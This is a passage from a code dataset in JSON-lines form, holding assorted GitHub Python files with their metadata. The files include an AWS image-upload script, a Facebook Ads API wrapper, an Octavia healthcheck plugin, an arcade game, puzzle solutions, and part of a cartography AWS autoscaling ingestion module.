break\n\nparent()","repo_name":"terryjbates/working_with_unix_processes","sub_path":"proccesses_can_fork.py","file_name":"proccesses_can_fork.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23883572392","text":"import os \r\nimport cv2\r\nimport time\r\nimport copy\r\nimport boto3\r\nimport json\r\nimport base64 \r\nimport awsconfig\r\nimport config\r\nfrom API.captureAPI import Capture\r\nimport argparse\r\n\r\n\r\nclient = boto3.client('stepfunctions', aws_access_key_id=awsconfig.access_key, aws_secret_access_key=awsconfig.secret_access_key,region_name= awsconfig.region_name)\r\n\r\ndef main(frame):\r\n\r\n if frame is not None:\r\n\r\n print(\"Uploading.......\")\r\n \r\n model = Capture().Frame(frame)\r\n\r\n model[\"config\"] = config.config\r\n\r\n\r\n #print(json.dumps(flowModel))\r\n\r\n response = client.start_execution(\r\n stateMachineArn = awsconfig.stepfunction_ARN,\r\n input = json.dumps(model)\r\n )\r\n\r\n print(response)\r\n\r\ndef find_dir():\r\n pathlist = []\r\n\r\n path = os.getcwd()\r\n\r\n for fd in os.listdir(path):\r\n full_path=os.path.join(path,fd)\r\n if os.path.isfile(full_path):\r\n if full_path.endswith('.png') or full_path.endswith('.jpg') or full_path.endswith('.jpeg'):\r\n pathlist.append(fd)\r\n return pathlist\r\n\r\nif __name__ == '__main__':\r\n\r\n typelist = [\"jpg\",\"png\",\"jpeg\"] \r\n\r\n parser = argparse.ArgumentParser(description='2021AI_BIGDATA_Class02_Demo, Only accept 3 Type of Imagefile .jpg .jpeg .png')\r\n parser.print_help()\r\n\r\n print(\"\\nStarted......\\n\")\r\n\r\n imagelist = find_dir()\r\n\r\n print(\"The image current you can use for Recognition:\")\r\n\r\n print(imagelist,\"\\n\")\r\n\r\n while True:\r\n frame = input(\"Please Enter the File Name: \")\r\n\r\n if frame != None: \r\n if (str(frame) not in imagelist):\r\n\r\n print(\"Warning! Image not found,Please Enter the correct filename.\")\r\n else:\r\n if str(frame).split(\".\")[1] not in typelist:\r\n print(\"Warning! Image filetype incorrect.\")\r\n else:\r\n image = cv2.imread(frame)\r\n main(image)\r\n\r\n else:\r\n print(\"Warning! Image not found,Please Enter the correct filename.\")\r\n","repo_name":"t109598031/week1_rekognition","sub_path":"local/open/capture_image.py","file_name":"capture_image.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32433640727","text":"#!/usr/bin/env python\nfrom requests import Session\nimport os\n\nCA = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'demoCA')\n\ncacert_path = os.path.join(CA, \"cacert.pem\")\ncert_path = os.path.join(CA, \"repository/testuser/testuser-client.pem\")\nkey_path = os.path.join(CA, \"repository/testuser/testuser-client.key\")\n\ndef http():\n uri = 'http://localhost:8080/' + os.environ.get('TEST_TARGET', '')\n s = Session()\n r = s.get(uri)\n print(\"TARGET: {}\".format(uri))\n print(\"STATUS_CODE: {}\".format(r.status_code))\n print(\"TEXT: {}\".format(r.text))\n\ndef https():\n uri = 'https://localhost:8443/' + os.environ.get('TEST_TARGET', '')\n s = Session()\n s.cert = (cert_path, key_path)\n s.headers.update({'user': 'testuser'})\n s.verify = cacert_path\n r = s.get(uri)\n print(\"TARGET: {}\".format(uri))\n print(\"STATUS_CODE: {}\".format(r.status_code))\n print(\"TEXT: {}\".format(r.text))\n\nif __name__ == \"__main__\":\n print(\"----------------------------------\")\n http()\n print(\"----------------------------------\")\n https()\n","repo_name":"kazufusa/til","sub_path":"20180423_private_ca/scripts/access-test.py","file_name":"access-test.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25278283681","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport data\n\n# 设置字体大小\nmatplotlib.rcParams.update({'font.size': 9})\nplt.rc('font', serif='Songti SC')\n\nif __name__ == '__main__':\n data_set1 = []\n data_set2 = []\n data_set3 = []\n data_set4 = []\n data_set5 = []\n data_set6 = []\n data_set7 = []\n for index in range(1, 21):\n path1 = '../result/' + str(index) + '_1_random_search.pkl'\n path2 = '../result/' + str(index) + '_2_random_restart_hill_climbing.pkl'\n path3 = '../result/' + str(index) + '_3_simulated_annealing.pkl'\n path4 = '../result/' + str(index) + '_4_improved_genetic_algorithm.pkl'\n path5 = '../result/' + str(index) + '_5_genetic_algorithm.pkl'\n path6 = '../result/' + str(index) + '_6_particle_swarm_optimization.pkl'\n path7 = '../result/' + str(index) + '_7_immune_genetic_algorithm.pkl'\n data_set1.append(data.read_result(path1))\n data_set2.append(data.read_result(path2))\n data_set3.append(data.read_result(path3))\n data_set4.append(data.read_result(path4))\n data_set5.append(data.read_result(path5))\n data_set6.append(data.read_result(path6))\n data_set7.append(data.read_result(path7))\n\n best_v = [0 for index in range(7)]\n # 获取随机搜索算法得到的最优解\n best_v[0] = data_set1[0][1]\n for l in data_set1:\n if l[1] > best_v[0]:\n best_v[0] = l[1]\n\n # 获取随机重复爬山算法得到的最优解\n best_v[1] = data_set2[0][1]\n for l in data_set2:\n if l[1] > best_v[1]:\n best_v[1] = l[1]\n\n # 获取重复模拟退火算法得到的最优解\n best_v[2] = data_set3[0][1]\n for l in data_set3:\n if l[1] > best_v[2]:\n best_v[2] = l[1]\n\n # 获取改进遗传算法得到的最优解\n for l in data_set4:\n best_v[3] += l[len(l) - 1][0][1]\n best_v[3] /= len(data_set4)\n\n # 获取遗传算法得到的最优解\n for l in data_set5:\n best_v[4] += l[len(l) - 1][0][1]\n best_v[4] /= len(data_set5)\n\n # 获取改进遗传算法得到的最优解\n for l in data_set6:\n best_v[5] += l[len(l) - 1][0][1]\n best_v[5] /= len(data_set6)\n\n # 获取免疫遗传算法得到的最优解\n for l in data_set7:\n best_v[6] += l[len(l) - 1][0][1]\n best_v[6] /= len(data_set7)\n\n # 输出各个算法得到的最优解\n print(np.round(best_v, 3))\n","repo_name":"oychao/paper","sub_path":"analysis/paper/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19211238763","text":"from facebookads.api import FacebookAdsApi\nfrom facebookads import objects\nfrom facebookads.api import FacebookRequest\nfrom facebookads.typechecker import TypeChecker\nfrom facebookads.adobjects.objectparser import ObjectParser\nfrom facebookads.adobjects.abstractcrudobject import AbstractCrudObject\nfrom facebookads.objects import (\n AdUser,\n Campaign,\n AdSet,\n Ad,\n AdCreative,\n AdImage,\n Insights,\n TargetingSpecsField,\n AdAccount\n)\nfrom facebookads.adobjects.adcreativelinkdata import AdCreativeLinkData\nfrom facebookads.adobjects.adcreativeobjectstoryspec import AdCreativeObjectStorySpec\nfrom facebookads.adobjects.targetinggeolocation import TargetingGeoLocation\nfrom .Exceptions import InvalidObject\nfrom . import utils\n\nclass YodaAccount(AdAccount):\n\n def __init__(self, fbid=None, parent_id=None, api=None):\n self._isYodaAccount = True\n super().__init__(fbid, parent_id, api)\n\n\n def createCampaign(self, name, spend_cap=10000):\n\n params = {\n Campaign.Field.name : name,\n Campaign.Field.status : Campaign.Status.paused,\n Campaign.Field.objective : Campaign.Objective.link_clicks,\n Campaign.Field.spend_cap : spend_cap\n }\n\n campaign = self.create_campaign(params = params)\n return campaign\n\n\n def getCampaignByName(self, name):\n allCampaigns = self.get_campaigns({Campaign.Field.name})\n campaign = None\n variasOcurrencias = False\n for camp in allCampaigns:\n if camp[Campaign.Field.name] == name:\n if campaign:\n raise LookupError(\"Hay más de una campaña con el mismo nombre\")\n campaign = camp\n return campaign\n\n\n\n def createAdSet(\n self,\n campaign, #objeto Campaign\n name,\n bid_amount,\n start_time,\n end_time, # Por defecto no terminaria\n country_code,\n daily_budget=50000,\n optimization_goal=AdSet.OptimizationGoal.link_clicks,\n status=AdSet.Status.paused,\n interests=[], #lista de objetos con id y nombre de cada interes\n age_min=None,\n age_max=None,\n genders=None\n ):\n targeting = {}\n targeting[TargetingSpecsField.geo_locations] = {\n TargetingGeoLocation.Field.countries: [country_code]\n }\n if age_max:\n targeting[TargetingSpecsField.age_max] = age_max\n if age_min:\n targeting[TargetingSpecsField.age_min] = age_min\n if genders:\n targeting[TargetingSpecsField.genders] = genders\n if interests:\n targeting[TargetingSpecsField.interests] = interests\n\n params = {}\n params[AdSet.Field.campaign_id] = campaign.get_id_assured()\n params[AdSet.Field.start_time] = start_time\n params[AdSet.Field.end_time] = end_time\n params[AdSet.Field.daily_budget] = daily_budget\n params[AdSet.Field.bid_amount] = bid_amount\n params[AdSet.Field.name] = name\n params[AdSet.Field.billing_event] = AdSet.BillingEvent.link_clicks\n params[AdSet.Field.optimization_goal] = optimization_goal\n params[AdSet.Field.status] = status\n params[AdSet.Field.targeting] = targeting\n\n response = self.create_ad_set(params=params)\n return response\n\n\n def createAdImage(self, filepath):\n image = AdImage()\n return image.api_create(parent_id=self.get_id_assured(),params={AdImage.Field.filename: filepath})\n\n\n def createAdCreative(self, name, imageHash, message, headline, description, caption, url, pageId):\n\n linkData = AdCreativeLinkData()\n linkData[AdCreativeLinkData.Field.message] = message\n linkData[AdCreativeLinkData.Field.link] = url\n linkData[AdCreativeLinkData.Field.caption] = caption\n linkData[AdCreativeLinkData.Field.description] = description\n linkData[AdCreativeLinkData.Field.name] = headline\n linkData[AdCreativeLinkData.Field.image_hash] = imageHash\n\n objectStorySpec = AdCreativeObjectStorySpec()\n objectStorySpec[AdCreativeObjectStorySpec.Field.page_id] = pageId\n objectStorySpec[AdCreativeObjectStorySpec.Field.link_data] = linkData\n\n params = {\n AdCreative.Field.image_hash: imageHash,\n AdCreative.Field.body: description,\n AdCreative.Field.title: headline,\n AdCreative.Field.actor_id: pageId,\n AdCreative.Field.object_story_spec: objectStorySpec,\n AdCreative.Field.name: name,\n }\n adCrea = AdCreative()\n return adCrea.api_create(parent_id=self.get_id_assured(), params=params)\n\n\n def createAd(self, name, adset, adcrea, status):\n ad = Ad()\n params = {\n Ad.Field.name: name,\n Ad.Field.adset_id: adset.get_id_assured(),\n Ad.Field.creative: adcrea,\n Ad.Field.redownload: True,\n Ad.Field.status: status\n }\n ad.api_create(parent_id=self.get_id_assured(), params=params)\n return ad\n\n\n def setSpendCap(self, spendCap):\n resp = self.api_update(params={AdAccount.Field.spend_cap: spendCap})\n return resp\n\n\n def getAccountInfo(self):\n fields = [\n AdAccount.Field.id,\n AdAccount.Field.account_id,\n AdAccount.Field.account_status,\n AdAccount.Field.amount_spent,\n AdAccount.Field.balance,\n AdAccount.Field.capabilities,\n AdAccount.Field.created_time,\n AdAccount.Field.currency,\n AdAccount.Field.disable_reason,\n AdAccount.Field.end_advertiser,\n AdAccount.Field.funding_source,\n AdAccount.Field.funding_source_details,\n AdAccount.Field.io_number,\n AdAccount.Field.min_campaign_group_spend_cap,\n AdAccount.Field.min_daily_budget,\n AdAccount.Field.name,\n AdAccount.Field.owner,\n AdAccount.Field.business,\n AdAccount.Field.partner,\n AdAccount.Field.spend_cap,\n AdAccount.Field.timezone_id,\n AdAccount.Field.timezone_name,\n AdAccount.Field.timezone_offset_hours_utc,\n AdAccount.Field.user_role\n ]\n return self.api_get(fields=fields)\n\n\n def getAdSetsRecommendations(self):\n adsets = self.get_ad_sets()\n recommendations = []\n for adset in adsets:\n recommendations.append(adset.api_get(fields={\"recommendations\"}))\n return recommendations\n\n\n def assign_user_to_ad_account(self, fields=None, params=None, batch=None, pending=False):\n param_types = {\n 'business': 'string',\n 'role': 'role_enum',\n 'user': 'string',\n }\n enums = {\n 'role_enum': [\n 'ADMIN',\n 'GENERAL_USER',\n 'REPORTS_ONLY'\n ],\n }\n request = FacebookRequest(\n node_id=self['id'],\n method='POST',\n endpoint='/userpermissions',\n api=self._api,\n param_checker=TypeChecker(param_types, enums),\n target_class=AbstractCrudObject,\n api_type='EDGE',\n response_parser=ObjectParser(target_class=AbstractCrudObject),\n )\n request.add_params(params)\n request.add_fields(fields)\n\n if batch is not None:\n request.add_to_batch(batch)\n return request\n elif pending:\n return request\n else:\n self.assure_call()\n return request.execute()\n\n\n def assignAdAccount(self, business_id):\n params = {\n 'business': business_id,\n 'role': 'ADMIN',\n 'user': utils.getCurrentAccountId()\n }\n resp = self.assign_user_to_ad_account(params=params)\n return resp\n\n\n def assignUser(self, business_id, act_id):\n params = {\n 'business': business_id,\n 'role': 'ADMIN',\n 'user': act_id\n }\n resp = self.assign_user_to_ad_account(params=params)\n return resp\n\n\n def getCampaignInsights(self, campaign):\n params = {\n 'date_preset': Campaign.DatePreset.last_7_days,\n 'fields': [Insights.Field.impressions, Insights.Field.ad_id, Insights.Field.cpc, Insights.Field.objective ]\n }\n fields = [\n 'campaign_name',\n 'adset_name',\n 'adset_id',\n 'impressions',\n 'website_clicks',\n 'app_store_clicks',\n 'deeplink_clicks',\n 'spend',\n 'reach',\n 'actions',\n 'action_values'\n ]\n return campaign.get_insights(params=params, fields=fields)","repo_name":"bertucho/facebook-ads-wrapper","sub_path":"YodaAccount.py","file_name":"YodaAccount.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75273485924","text":"import datetime\n\nfrom oslo_config import cfg\nfrom oslo_middleware.healthcheck import pluginbase\n\nfrom octavia.db import api as db_apis\nfrom octavia.db import healthcheck\n\nCONF = cfg.CONF\n\n\nclass OctaviaDBHealthcheck(pluginbase.HealthcheckBaseExtension):\n\n UNAVAILABLE_REASON = 'The Octavia database is unavailable.'\n\n last_check = None\n last_result = None\n last_message = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def healthcheck(self, server_port):\n try:\n if (self.last_check is not None and\n ((datetime.datetime.now() -\n self.last_check).total_seconds()) <\n CONF.api_settings.healthcheck_refresh_interval):\n result = self.last_result\n message = self.last_message\n else:\n session = db_apis.get_session()\n with session.begin():\n result, message = healthcheck.check_database_connection(\n session)\n self.last_check = datetime.datetime.now()\n self.last_result = result\n self.last_message = message\n if result:\n return OctaviaDBCheckResult(available=True, reason=\"OK\")\n else:\n return OctaviaDBCheckResult(available=False,\n reason=self.UNAVAILABLE_REASON,\n details=message)\n except Exception as e:\n return OctaviaDBCheckResult(available=False,\n reason=self.UNAVAILABLE_REASON,\n details=str(e))\n\n\nclass OctaviaDBCheckResult(pluginbase.HealthcheckResult):\n \"\"\"Result sub-class to provide a unique name in detail reports.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n","repo_name":"openstack/octavia","sub_path":"octavia/api/healthcheck/healthcheck_plugins.py","file_name":"healthcheck_plugins.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"8185889268","text":"def generator(n) :\n for i in range(0, n) :\n yield i ** 2 \n\nn = int(input(\"Write number\"))\nfor x in generator(n) :\n print(x)\n\n\n\n\n\n\n\n\n\n# number = int(input(\"Write number: \"))\n# even_n = [i for i in range(number) if i%2==0]\n# print(\"All even numbers up to {}\".format(number))\n# print(*even_n,sep =\", \")","repo_name":"NuraKunanbaev/-pp2-22B030491","sub_path":"TSIS4/generators/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260752042","text":"from heapq import heappop, heappush\n\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\ndef result():\n my_max = 0\n for y in range(M):\n if 0 in farm[y]:\n return -1\n my_max = max([my_max]+ farm[y])\n return my_max-1\n\nN, M = map(int, input().split())\nfarm = [list(map(int, input().split())) for _ in range(M)]\n\nh = []\nans = 0\nfor y in range(M):\n for x in range(N):\n if farm[y][x] == 1:\n heappush(h, (1, y, x))\n\nwhile h:\n n, y, x = heappop(h)\n for d in range(4):\n my = y + dy[d]\n mx = x + dx[d]\n if 0<=my n+1 or not farm[my][mx]:\n farm[my][mx] = n+1\n heappush(h, (n+1, my, mx))\n\n\nprint(result())","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210518/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40260841331","text":"\"\"\" Lab 7 - User Control \"\"\"\n\nimport arcade\n\n# --- Constants ---\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nMOVEMENT_SPEED = 5\n\n# lilypad drawing function\n\ndef lilypad(x, y):\n # lilypad\n arcade.draw_ellipse_filled(x, y, 300, 300, arcade.color.DARK_GREEN)\n arcade.draw_triangle_filled(x, 30 + y, -50 + x, 150 + y, 50 + x, 150 + y, arcade.csscolor.DARK_BLUE)\n\n# tadpole drawing function\n\ndef tadpole(x, y):\n arcade.draw_ellipse_filled(x, -60 + y, 40, 90, arcade.color.GRAY)\n arcade.draw_ellipse_filled(x, -60 + y, 20, 70, arcade.color.BLACK)\n arcade.draw_ellipse_filled(x, y, 50, 70, arcade.color.BLACK)\n\n# dragonfly drawing function\n\ndef dragonfly(x, y):\n arcade.draw_ellipse_filled(-40 + x, 45 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=20)\n arcade.draw_ellipse_filled(-40 + x, 15 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=-20)\n arcade.draw_ellipse_filled(40 + x, 15 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=20)\n arcade.draw_ellipse_filled(40 + x, 45 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=-20)\n arcade.draw_ellipse_filled(x, y, 20, 120, arcade.csscolor.BLACK)\n arcade.draw_ellipse_filled(x, 60 + y, 24, 24, arcade.csscolor.BLACK)\n\n# Dragonfly class\n\nclass Dragonfly:\n def __init__(self, position_x, position_y, color):\n self.position_x = position_x\n self.position_y = position_y\n self.color = color\n\n def draw(self):\n arcade.draw_ellipse_filled(-40 + self.position_x, 45 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n tilt_angle=20)\n arcade.draw_ellipse_filled(-40 + self.position_x, 15 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n tilt_angle=-20)\n arcade.draw_ellipse_filled(40 + self.position_x, 15 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n tilt_angle=20)\n arcade.draw_ellipse_filled(40 + self.position_x, 45 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n tilt_angle=-20)\n arcade.draw_ellipse_filled(self.position_x, self.position_y, 20, 120, self.color)\n arcade.draw_ellipse_filled(self.position_x, 60 + self.position_y, 24, 24, self.color)\n\n# Tadpole class\n\nclass Tadpole:\n def __init__(self, position_x, position_y, change_x, change_y, width, height, color):\n # Take the parameters of the init function above,\n # and create instance variables out of them.\n self.position_x = position_x\n self.position_y = position_y\n self.change_x = change_x\n self.change_y = change_y\n self.width = width\n self.height = height\n self.color = color\n\n self.border_sound = arcade.load_sound(\":resources:sounds/hurt3.wav\")\n self.border_sound_player = None\n\n # Drawing function with class parameters\n\n def draw(self):\n\n arcade.draw_ellipse_filled(self.position_x, -60 + self.position_y, self.width + -10, self.height + 20,\n arcade.color.GRAY)\n arcade.draw_ellipse_filled(self.position_x, -60 + self.position_y, self.width + -30, self.height,\n self.color)\n arcade.draw_ellipse_filled(self.position_x, self.position_y, self.width, self.height, self.color)\n\n def play(self):\n if not self.border_sound_player or not self.border_sound_player.playing:\n self.border_sound_player = arcade.play_sound(self.border_sound)\n\n #\n def update(self):\n self.position_y += self.change_y\n self.position_x += self.change_x\n\n if self.position_x < 0:\n self.position_x = 0\n self.play()\n\n if self.position_x > SCREEN_WIDTH:\n self.position_x = SCREEN_WIDTH\n self.play()\n\n if self.position_y < 0:\n self.position_y = 0\n self.play()\n\n if self.position_y > SCREEN_HEIGHT:\n self.position_y = SCREEN_HEIGHT\n self.play()\n\n\nclass MyGame(arcade.Window):\n \"\"\" Our Custom Window Class\"\"\"\n\n def __init__(self):\n \"\"\" Initializer \"\"\"\n\n # Call the parent class initializer\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, \"Lab 7 - User Control\")\n\n self.set_mouse_visible(False)\n\n arcade.set_background_color(arcade.csscolor.DARK_BLUE)\n\n self.click_sound = arcade.load_sound(\":resources:sounds/coin5.wav\")\n\n self.tadpole = Tadpole(200, 200, 0, 0, 50, 70, arcade.csscolor.BLACK)\n self.dragonfly = Dragonfly(400, 400, arcade.csscolor.BLACK)\n\n def update(self, delta_time):\n self.tadpole.update()\n\n def on_key_press(self, key, modifiers):\n \"\"\" Called whenever the user presses a key. \"\"\"\n if key == arcade.key.LEFT:\n self.tadpole.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.tadpole.change_x = MOVEMENT_SPEED\n elif key == arcade.key.UP:\n self.tadpole.change_y = MOVEMENT_SPEED\n elif key == arcade.key.DOWN:\n self.tadpole.change_y = -MOVEMENT_SPEED\n\n def on_key_release(self, key, modifiers):\n \"\"\" Called whenever a user releases a key. \"\"\"\n if key == arcade.key.LEFT or key == arcade.key.RIGHT:\n self.tadpole.change_x = 0\n elif key == arcade.key.UP or key == arcade.key.DOWN:\n self.tadpole.change_y = 0\n\n def on_mouse_press(self, x, y, button, modifiers):\n \"\"\" Called when the user presses a mouse button. \"\"\"\n\n if button == arcade.MOUSE_BUTTON_LEFT:\n arcade.play_sound(self.click_sound)\n elif button == arcade.MOUSE_BUTTON_RIGHT:\n arcade.play_sound(self.click_sound)\n\n def on_draw(self):\n\n arcade.start_render()\n lilypad(450, 700)\n lilypad(200, 400)\n lilypad(500, 100)\n self.tadpole.draw()\n self.dragonfly.draw()\n\n def on_mouse_motion(self, x, y, dx, dy):\n \"\"\" Called to update our objects.\n Happens approximately 60 times per second.\"\"\"\n self.dragonfly.position_x = x\n self.dragonfly.position_y = y\n\n\ndef main():\n MyGame()\n arcade.run()\n\n\nmain()\n","repo_name":"ef2025/learn-arcade-work","sub_path":"Lab 07 - User Control/lab_07.py","file_name":"lab_07.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32985219671","text":"import logging\nfrom typing import Dict\nfrom typing import List\n\nimport boto3\nimport neo4j\n\nfrom .util import get_botocore_config\nfrom cartography.util import aws_handle_regions\nfrom cartography.util import run_cleanup_job\nfrom cartography.util import timeit\n\nlogger = logging.getLogger(__name__)\n\n\n@timeit\n@aws_handle_regions\ndef get_ec2_auto_scaling_groups(boto3_session: boto3.session.Session, region: str) -> List[Dict]:\n client = boto3_session.client('autoscaling', region_name=region, config=get_botocore_config())\n paginator = client.get_paginator('describe_auto_scaling_groups')\n asgs: List[Dict] = []\n for page in paginator.paginate():\n asgs.extend(page['AutoScalingGroups'])\n return asgs\n\n\n@timeit\n@aws_handle_regions\ndef get_launch_configurations(boto3_session: boto3.session.Session, region: str) -> List[Dict]:\n client = boto3_session.client('autoscaling', region_name=region, config=get_botocore_config())\n paginator = client.get_paginator('describe_launch_configurations')\n lcs: List[Dict] = []\n for page in paginator.paginate():\n lcs.extend(page['LaunchConfigurations'])\n return lcs\n\n\n@timeit\ndef load_launch_configurations(\n neo4j_session: neo4j.Session, data: List[Dict], region: str, current_aws_account_id: str, update_tag: int,\n) -> None:\n ingest_lc = \"\"\"\n UNWIND $launch_configurations as lc\n MERGE (config:LaunchConfiguration{id: lc.LaunchConfigurationARN})\n ON CREATE SET config.firstseen = timestamp(), config.name = lc.LaunchConfigurationName,\n config.arn = lc.LaunchConfigurationARN,\n config.created_time = lc.CreatedTime\n SET config.lastupdated = $update_tag, config.image_id = lc.ImageId,\n config.key_name = lc.KeyName,\n config.security_groups = lc.SecurityGroups,\n config.instance_type = lc.InstanceType,\n config.kernel_id = lc.KernelId,\n config.ramdisk_id = lc.RamdiskId,\n config.instance_monitoring_enabled = lc.InstanceMonitoring.Enabled,\n config.spot_price = lc.SpotPrice,\n config.iam_instance_profile = lc.IamInstanceProfile,\n config.ebs_optimized = lc.EbsOptimized,\n config.associate_public_ip_address = lc.AssociatePublicIpAddress,\n config.placement_tenancy = lc.PlacementTenancy,\n config.region=$Region\n WITH config\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(config)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n for lc in data:\n lc['CreatedTime'] = str(int(lc['CreatedTime'].timestamp()))\n\n neo4j_session.run(\n ingest_lc,\n launch_configurations=data,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n\n@timeit\ndef load_ec2_auto_scaling_groups(\n neo4j_session: neo4j.Session, data: List[Dict], region: str, current_aws_account_id: str, update_tag: int,\n) -> None:\n ingest_group = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MERGE (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n ON CREATE SET group.firstseen = timestamp(),\n group.createdtime = ag.CreatedTime\n SET group.launchconfigurationname = ag.LaunchConfigurationName,\n group.launchtemplatename = ag.LaunchTemplate.LaunchTemplateName,\n group.launchtemplateid = ag.LaunchTemplate.LaunchTemplateId,\n group.launchtemplateversion = ag.LaunchTemplate.Version,\n group.maxsize = ag.MaxSize, group.minsize = ag.MinSize, group.defaultcooldown = ag.DefaultCooldown,\n group.desiredcapacity = ag.DesiredCapacity, group.healthchecktype = ag.HealthCheckType,\n group.healthcheckgraceperiod = ag.HealthCheckGracePeriod, group.status = ag.Status,\n group.newinstancesprotectedfromscalein = ag.NewInstancesProtectedFromScaleIn,\n group.maxinstancelifetime = ag.MaxInstanceLifetime, group.capacityrebalance = ag.CapacityRebalance,\n group.name = ag.AutoScalingGroupName,\n group.lastupdated = $update_tag,\n group.region=$Region\n WITH group\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_vpc = \"\"\"\n UNWIND $vpc_id_list as vpc_id\n MERGE (subnet:EC2Subnet{subnetid: vpc_id})\n ON CREATE SET subnet.firstseen = timestamp()\n SET subnet.lastupdated = $update_tag\n WITH subnet\n MATCH (group:AutoScalingGroup{arn: $GROUPARN})\n MERGE (subnet)<-[r:VPC_IDENTIFIER]-(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_instance = \"\"\"\n UNWIND $instances_list as i\n MERGE (instance:Instance:EC2Instance{id: i.InstanceId})\n ON CREATE SET instance.firstseen = timestamp()\n SET instance.lastupdated = $update_tag, instance.region=$Region\n WITH instance\n MATCH (group:AutoScalingGroup{arn: $GROUPARN})\n MERGE (instance)-[r:MEMBER_AUTO_SCALE_GROUP]->(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n WITH instance\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(instance)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_lts = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MATCH (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n MATCH (template:LaunchTemplate{id: ag.LaunchTemplate.LaunchTemplateId})\n MERGE (group)-[r:HAS_LAUNCH_TEMPLATE]->(template)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_lcs = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MATCH (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n MATCH (config:LaunchConfiguration{name: ag.LaunchConfigurationName})\n MERGE (group)-[r:HAS_LAUNCH_CONFIG]->(config)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n launch_configs = []\n launch_templates = []\n for group in data:\n if group.get('LaunchConfigurationName'):\n launch_configs.append(group)\n if group.get('LaunchTemplate'):\n launch_templates.append(group)\n\n group['CreatedTime'] = str(group['CreatedTime'])\n\n neo4j_session.run(\n ingest_group,\n autoscaling_groups_list=data,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n neo4j_session.run(\n ingest_lcs,\n autoscaling_groups_list=launch_configs,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n neo4j_session.run(\n ingest_lts,\n autoscaling_groups_list=launch_templates,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n for group in data:\n group_arn = group[\"AutoScalingGroupARN\"]\n if group.get('VPCZoneIdentifier'):\n vpclist = group[\"VPCZoneIdentifier\"]\n if ',' in vpclist:\n data = vpclist.split(',')\n else:\n data = vpclist\n neo4j_session.run(\n ingest_vpc,\n vpc_id_list=data,\n GROUPARN=group_arn,\n update_tag=update_tag,\n )\n\n if group.get(\"Instances\"):\n data = group[\"Instances\"]\n neo4j_session.run(\n ingest_instance,\n instances_list=data,\n GROUPARN=group_arn,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n\n@timeit\ndef cleanup_ec2_auto_scaling_groups(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:\n run_cleanup_job(\n 